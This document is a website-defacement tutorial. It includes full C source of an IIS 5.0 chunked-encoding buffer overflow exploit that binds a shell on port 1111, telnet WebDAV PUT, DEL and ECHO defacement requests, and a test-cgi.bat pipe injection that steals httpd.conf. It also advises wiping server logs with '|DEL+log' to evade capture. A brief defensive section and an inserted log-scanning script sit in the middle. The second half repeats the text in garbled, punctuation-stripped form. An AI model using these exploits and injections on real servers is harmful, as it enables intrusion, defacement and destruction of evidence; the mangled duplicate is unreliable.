 * Windows 2000 Server Exploit By CHINANSL Security Team
 * Test on Windows 2000 Chinese Version, IIS 5.0, not patched.
 * Warning: THIS PROGRAM WILL ONLY TEST!
 * CHINANSL Technology CO., LTD.  http://www.chinansl.com
 * keji@chinansl.com
 * use MS VC++ to compile this piece of code
 */
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "Ws2_32")

int main(int argc, char *argv[])
{
    if (argc != 4) {
        printf("%s ip port aspfilepath\n\n", argv[0]);
        printf("  ie. %s 127.0.0.1 80 iisstart.asp\n", argv[0]);
        puts("  programed by keji@chinansl.com");
        return 0;
    }

    DWORD srcdata = 0x01e2fb1c - 4;   /* 0x00457474 */
    /* address of SHELLCODE */
    DWORD jmpaddr = 0x00457494;       /* 0x77ebf094, 0x01e6fcec */
    /* "\x1c\xfb\xe6\x01", "\x0c\xfb\xe6\x01" */

    char *destIP   = argv[1];
    char *destFile = argv[3];
    int   webport  = atoi(argv[2]);
    char *pad = "\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02\x02" "PADP"; /* 16 bytes */

    WSADATA ws;
    SOCKET  s;
    long    result = 0;

    if (WSAStartup(0x0101, &ws) != 0) {
        puts("WSAStartup() error");
        return -1;
    }

    struct sockaddr_in addr;
    addr.sin_family      = AF_INET;
    addr.sin_port        = htons(webport);
    addr.sin_addr.s_addr = inet_addr(destIP);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1) {
        puts("Socket create error");
        return -1;
    }
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        puts("Cannot connect to the specified host");
        return -1;
    }

    char buff[4096];
    char *shellcode =
        "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x89"
        "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
        "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
        "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
        "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
        "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
        "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
        "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
        "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
        "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
        "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
        "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
        "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
        "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
        "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
        "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
        "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
        "\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
        "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
        "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
        "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
        "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
        "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
        "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
        "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
        "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
        "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";

    /* request pieces; the format string below supplies the path and " HTTP/1.1" */
    char *s1 = "POST /";
    char *s2 = "Accept: */*\r\n";
    char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char *sc = "0\r\n\r\n\r\n";

    /* NOP sled with the shellcode at its end, sent as part of the request URI */
    char shellcodebuff[1024 * 8];
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1],
           shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

    char sendbuff[1024 * 16];
    memset(sendbuff, 0, 1024 * 16);
    sprintf(sendbuff,
            "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, /* srcdata, jmpaddr, */ sc);
    int sendlen = strlen(sendbuff);

    /* patch the two 4-byte chunk bodies with the return address and data pointer */
    *(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff, "AAAA") = srcdata;

    result = send(s, sendbuff, sendlen, 0);
    if (result == -1) {
        puts("Send shellcode error");
        return -1;
    }

    memset(buff, 0, 4096);
    result = recv(s, buff, sizeof(buff), 0);
    if (strstr(buff, "<html>") != NULL) {
        /* an HTML response means the server answered normally: the overflow failed */
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error! Try again!");
        return -1;
    }

    shutdown(s, 0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host, try run this program again!");
    return 0;
}
```

The above code is called an exploit code; these are written in powerful programming languages like C, Perl or sometimes Java. Exploit codes are written according to the vulnerability. Vulnerabilities were discovered in the past; nowadays it has been seen that server software and operating systems are patched for these vulnerabilities. So you can't just execute exploit code to break into a server; you must rework an exploit code so that it works according to your needs. One more thing I must mention is that you must keep yourself updated with the latest vulnerabilities by visiting the sites that I have mentioned earlier in the tutorial. Well, I think it's better that you code your own exploit code in Perl or C in order to break into websites.

NOTE: I am talking about high profile websites; I am not talking about lame websites coded in Notepad.

Keeping yourself safe

Well, you must be familiar with server software like Apache, Microsoft IIS etc. So you must know about the log files, which record each and every request made to the server. As it records everything, system administrators will have no problem catching the malicious cracker or script kiddie, as the log file will have the IP (Internet Protocol) address, and through the IP address you can trace the cracker or the script kiddie.

NOTE: Read my tutorial on Gathering Information of Remote Host.

TIP: If you do not want to get busted you must clear the log files after you break into a web server.

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. So you can use a cross site scripting vulnerability to clear the log files. You can do this by executing the following URL:

http://www.target.com/cgi-bin/test-cgi.bat|DEL+log

NOTE: The above URL can be used on Apache server software.

In case of IIS on Windows 2000 you can use the following method to get a DOS shell through telnet.

The CHINANSL exploit code listed above (under "Overworking known vulnerabilities") exploits a buffer overflow in IIS 5 on Windows 2000 Server, opens port 1111 and binds a shell to it. If the exploit is successful then all you have to do is use telnet to connect to port 1111 of the target, and the system is yours.


IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run it. Now you must be wondering what the use of this code is. Actually, the C code causes an overflow in IIS on Windows 2000 and commands the system to bind a shell to the source IP on port 1111. So once the exploit works there will be a shell bound on port 1111 on the target system. To work it out you must telnet to port 1111 of the target IP; through this you will be connected to the system without any kind of authentication.

Various Security Measures

Website defacement has become a terrible problem for IT (Information Technology) based companies. Every day thousands of websites are defaced. Well, even government websites are defaced for different reasons; the most common reason is cyber war. Like in reality there are wars between two rival countries, similarly in the wired world there are cyber wars.

If you want to see the web attack archive visit the following site:

http://defaced.alldas.org

Now some security measures for the system administrators:

- First of all you must coordinate and organize your web root with suitable directories. What I mean to say is that you must organize your files, like images in an image directory, one for server side contents, and so on and so forth. If you don't configure your web root properly then your web server will be prone to many attacks.

- You must be aware of the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

Well, every web server is vulnerable, but you must not fear; you must download the latest patches for the particular vulnerability.

Well, the last thing is that you must be able to predict the moves of a malicious cracker or a script kiddie. You need to know how a cracker breaks into your site or web server, you need to know the motive behind the attack, and you must think, act and work like a hacker and take the cracker out from the root.
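As an added example that is not part of this tutorial: a log check an administrator could run over web server access logs to spot the request shapes this tutorial relies on (the test-cgi.bat pipe trick, WebDAV write verbs, a fetched httpd.conf, an oversized POST to an .asp page). The log lines, client IPs and the MAX_SANE_PATH threshold are constructed and assumed, not real traffic.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Apache combined-style log line. IIS W3C logs are laid out differently but
# carry the same fields: client IP, time, method, URI, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# WebDAV / write verbs used in the tutorial to create, delete or replace pages.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK"}
# Assumed ceiling for a legitimate URI on this site; an 8 KB request line aimed
# at an .asp page is the shape of the chunked-encoding overflow shown above.
MAX_SANE_PATH = 1024

# Constructed sample traffic (not real log data) mirroring the tutorial's moves:
# a WebDAV write probe, test-cgi.bat pipe injection, config theft, log wiping,
# a DELETE attempt, an oversized POST to an ASP page and a bogus ECHO verb.
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [17/Feb/2006:10:53:00 +0000] "GET /index.html HTTP/1.1" 200 5123',
    '203.0.113.7 - - [17/Feb/2006:10:53:04 +0000] "PUT /scripts/htwasp HTTP/1.1" 201 0',
    '203.0.113.9 - - [17/Feb/2006:10:54:10 +0000] "GET /cgi-bin/test-cgi.bat|copy+conf/httpd.conf+htdocs/httpd.conf HTTP/1.1" 200 0',
    '203.0.113.9 - - [17/Feb/2006:10:54:12 +0000] "GET /httpd.conf HTTP/1.1" 200 33912',
    '203.0.113.9 - - [17/Feb/2006:10:55:01 +0000] "GET /cgi-bin/test-cgi.bat|DEL+log HTTP/1.1" 200 0',
    '198.51.100.4 - - [17/Feb/2006:10:56:08 +0000] "DELETE /index.html HTTP/1.1" 403 0',
    '198.51.100.4 - - [17/Feb/2006:10:57:30 +0000] "POST /iisstart.asp' + "A" * 3000 + ' HTTP/1.1" 500 0',
    '198.51.100.4 - - [17/Feb/2006:10:58:11 +0000] "ECHO Site defaced by SB >> index.html HTTP/1.1" 400 87',
])


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access-log line into its fields, or None if it is not well formed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (rule, severity) hits for one parsed entry, keyed to this tutorial's techniques."""
    hits: List[Tuple[str, str]] = []
    method, path, status = entry["method"], entry["path"], int(entry["status"])
    lower = path.lower()
    if "test-cgi.bat" in lower and "|" in lower:
        # A pipe after the batch file hands the rest of the URL to a DOS shell.
        hits.append(("test-cgi.bat pipe command injection", "high"))
    elif lower.endswith("httpd.conf"):
        # The server's own configuration should never be reachable under the web root.
        hits.append(("httpd.conf fetched from web root", "medium"))
    if method in WRITE_METHODS:
        ok = 200 <= status < 300
        hits.append((f"{method} {'succeeded' if ok else 'attempted'}", "high" if ok else "medium"))
    if ".asp" in lower and len(path) > MAX_SANE_PATH:
        hits.append(("oversized request to ASP page (overflow attempt)", "high"))
    return hits


def scan(log_text: str) -> List[Dict[str, str]]:
    """Run every rule over every line; unparseable request lines are reported too."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        if entry is None:
            # e.g. "ECHO ... >> index.html": not an HTTP verb at all, still worth a look.
            findings.append({"ip": line.split(" ", 1)[0], "rule": "unparseable request line",
                             "severity": "low", "path": line[:80]})
            continue
        for rule, severity in classify(entry):
            findings.append({"ip": entry["ip"], "ts": entry["ts"], "method": entry["method"],
                             "path": entry["path"][:60], "rule": rule, "severity": severity})
    return findings


def offenders(findings: List[Dict[str, str]], min_severity: str = "high") -> Counter:
    """Findings per client IP at or above min_severity: the IP is what the log gives you to trace."""
    rank = {"low": 0, "medium": 1, "high": 2}
    return Counter(f["ip"] for f in findings if rank[f["severity"]] >= rank[min_severity])


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f['severity']:6} {f['ip']:14} {f['rule']}: {f['path']}")
    print("high-severity hits per IP:", dict(offenders(hits)))
```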

So this completes my tutorial on Defacing Websites. I hope you have understood the involutions of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 7: Defacing Website

DEL This is a command for deleting files on the web server This

command requires write access on the assigned virtual directory

where the file is to be deleted

Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

del indexhtml HTTP11rnrn

Sidetrack Most probably you will get a 403 Forbidden Error as it

is quiet obvious that the wwwroot directory will never have a

write access

PUT It is used to create files on the server it necessitates write

access on the particular virtual directory where the file is to be

created

Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

PUT cctxt HTTP11rnrn

Sidetrack Most probably you will get a 403 Forbidden Error as it

is quiet obvious that the wwwroot directory will never have a

write access

ECHO The publishing tool it is the same command used in DOS

(Disk Operating System) Batch Files The output can be redirected

Microsoft Telnetgt wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn

TIP SB is the acronym of my name Shubham Bhattacharya

When you are defacing a site you can also use acronyms of your

name

PROPFIND Propfind is used as a request for directory surfing

NOTE In IIS server it is used as an administrative tool for web

server analysis

Microsoft Telnetgt wwwhackingtheworldilitehostcom 80

Connected to wwwhackingtheworldilitehostcom

PROPFIND HTTP11

Hostiis-server

Content-Length0

Sidetrack You will definitely get a 403 Forbidden Error as it is

quiet evident that the wwwroot will never have a write access

Well you must be wondering how you can test write access

permission for a particular directory in IIS server

To test the write access permission for a particular directory in IIS

server follow the steps given below

- To test if write access permission is enabled for anonymous web

clients then telnet the web server or the website in port 80 and

make the following request

PUT scriptshtwasp HTTP11

Host iis-server

Content-Length 10 ltentergtltentergt

Once you make the following request the server should respond

with a 100 Continue Message

HTTP11 100 Continue

Server Microsoft-IIS50

Date Sun 17 Feb 2006 105300 GMT

On receiving the above type 10 letters

XXXXXXXXXX

HTTP11 201 Created

Server Microsoft-IIS50

Date Sun 17 Feb 2006 105608 GMT

Location httpiis-serverdirmy_filetxt

Content-Length 0

Allow OPTIONS TRACE GET HEAD DELETE PUT COPY

MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK

If the server responds with this 201 Created response then the

write permission is enabled

EXECUTION ACCESS

Server side pages like ASP PHP JSP or DLL are used in highly

advanced database driven dynamic websites which dynamically

generates the HTML and sends it to the client (web browser)

These server side pages and other executables including DLL and

EXE files needs execution perquisites in the virtual directory

where they are kept

NOTE DLL EXE etc need execution perquisites they are kept in a

single virtual directory

DIRECTORY SURFING

It has been often seen that web servers to be more specific

virtual directories of web servers are configured as such to

provide directory surfing access to all clients or special clients

through proper authentications Actually directory browsing

means that you can list the file and folders present in your virtual

directory just as you see in your standalone system Well most of

the web server administrators turn off this feature But exploit

codes can be used to get directory listing of the virtual directory

EXPLOIT FOR DIRECTORY LISTING IN APACHE

Well if you are not familiar with apache then let me give you a

brief description Apache is a server in which you have to

configure your web server using command and scripts These

scripts and commands are kept in httpdconf file in capache

groupapacheconf folder default Apache installation on a

distinctive windows system This file contains all the settings of

the web server and if we get our hands into this file then we get

to know all the settings of the web server including the location of

log files directory permissions write access authentication levels

etc

So now letrsquos get on with the exploit As we know that Apache is

the most preferred web server This web server has a bat in its

cgi-bin directory This bat file is named as test-cgibat Actually

the motive of the bat file is to test the privileges of cgi-bin

directory

NOTE cgi-bin directory contains all the CGI and Perl scripts

Well it is quiet obvious that cgi-bin virtual directory has execution

permissions These conditions are exploited to perform out

pernicious attacks The bat file in Apache web server is called as

execution of DOS (Disk Operating Systems) The DOS shell is

spawned to it for execution Now we can use | (pipe) character

along with the batch file to execute commands on the remote

server

NOTE If you donrsquot know how to put the | (pipe) character then

donrsquot worry To put the pipe character press Alt+ the

character is just beside your backspace key

So the attack URL will be like this

httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd

conf+htdocshttpdconf

Through the above URL I have copied the httpdconf file from the

conf directory The conf directory mostly does not have read

access to the Apache web root that is htdocs virtual folder Now

we can easily download the httpdconf file using the following

URL

httptargetcomhttpdconf

Since it occupies in the Apache web root Through this method

you will get the httpdconf file and through the httpdconf file you

can get some worthful information about the web server

Inspecting known vulnerabilities

Generally websites are defaced and hacked using vulnerabilities

related with the server software or the Operating System running

the server software Well most of the lsquohackersrsquo deface websites

using vulnerabilities Please note I am talking about hackers not

script kiddies who deface websites using uncanny softwares So

you must know what vulnerability is well if you donrsquot know then

let me tell you all Vulnerability is an existing flaw or defect in the

software architecture which allows a hacker or cracker to take

control over the system or issue capricious system commands to

the server In every software or application or tool vulnerabilities

persist

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

The above sites contain latest vulnerabilities with exploit codes

Even if you are an elite or a professional you will find the

information useful

Working with Exploits

Well I must say this is the most exciting part of this tutorial

Okay so wwwvictimcom is the target site Well through the

above methods I mean the methods I have explained earlier in

the tutorial through those methods we have found out that the

website is functioning in Microsoft IIS server software So it is

time to find some vulnerability I am using Acutenix Web Security

Scanner to scan for vulnerabilities You guys must know

programming languages like Perl or Socket Programming or C this

is essential because through this you will be able to compile the

exploits So once you get vulnerability try exploiting it by

executing it in your client (browser)

MICROSOFT FRONPAGE EXTENSION EXPLOIT

This is one of the methods for website defacement using Microsoft

Web Publishing Wizard Using this method one can deface

Websites having FrontPage Server extensions By using Microsoft

Web Publishing Wizard one can replace FrontPage Server

extension pages

Follow the steps given below to execute the following exploit

Telnet the Target website or web server in port 80

CTelnet wwwvictimcom 80

You will get a blank screen type GET and continue pressing

enter till the web server responds to your requests

GET ltENTERgtltENTERgt

NOTE Web servers functioning in IIS server have FrontPage

Extensions enabled by default

So After pressing enter you will get the following

HTTP11 400 Bad Request

Server Microsoft-IIS50

Date Thu 17 Feb 2006 041845 GMT

Content-Type texthtml

Content-Length 87

Once you get the HTTP Bad Request you have search for the

homepage Most of the sites have the default homepage as

httpwwwvictimservercommainasp

httpwwwvictimservercomindexhtml

httpwwwvictimservercomindexhtm

httpwwwvictimservercomindexasp

httpwwwvictimservercommainhtm

httpwwwvictimservercommainhtm

httpwwwvictimservercomdefaulthtm

httpwwwvictimservercomdefaultasp

httpwwwvictimservercomdefaulthtml

Keep assaying all possible FrontPage Extensions unless the page

loads If the extension doesnrsquot exist then it will give a 404 Error

Let us say you have got the homepage as

wwwvictimcomindexhtml so design the page which you want

upload or modify the homepage Here the homepage is indexhtml

once you design the page or modify the page save it as

indexhtml

Now open Web Publishing Wizard and follow the steps given

below

- Open Microsoft Web Publishing Wizard

- Now browse the file that you are going to upload Here

indexhtml is the file which we are going to upload

- Now you get a screen where you have to name the web server

Type in anything and click on Advanced

- Select the service provider from the drop down box This is

nothing but the kind of uploading it is going to do Since your

motive is to deface the site select the FrontPage Extended Web

option since this method of defacing works only for FrontPage

enabled sites

- Type the URL of the victim server homepage and in the given

box here it is wwwvictimcomindexhtml

- Here specify the URL that you type in the Web browser to access

the victim server website

- Select the connection method that you use to access the internet

- Click Finish Voila you have successfully replaced the victimrsquos

homepage with yours

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some

coding exploits I am going to present some exploit codes written

in the most powerful programming language C

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

use MS VC++ to compile this piece of code

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

The above code is called as an exploit code these are written in

powerful programming languages like C Perl or sometimes JAVA

Exploit Codes are written according to the vulnerability

Vulnerabilities were discovered in the past nowadays it has been

seen that server softwares and operating systems are patched for

these vulnerabilities So you canrsquot just execute exploit code to

break into a server you must overwork an exploit code so that it

works according to your needs One more thing I must mention is

that you must keep yourself updated with latest vulnerabilities by

visiting the sites that I have mentioned earlier in the tutorial

Well I think its better that you code your own exploit code in Perl

or C in order to break into websites

NOTE I am talking about high profile websites I am not talking

about lame websites coded in notepad

Keeping yourself safe

Well you must be familiar with server softwares like Apache

Microsoft IIS etc So you must be knowing about the log files

which records each and every request made by the server As it

records everything system administrators will have no problem

catching the malicious cracker or script kiddie as the log file will

have the IP (Internet Protocol) address and through the IP

address you can trace the cracker or the script kiddie

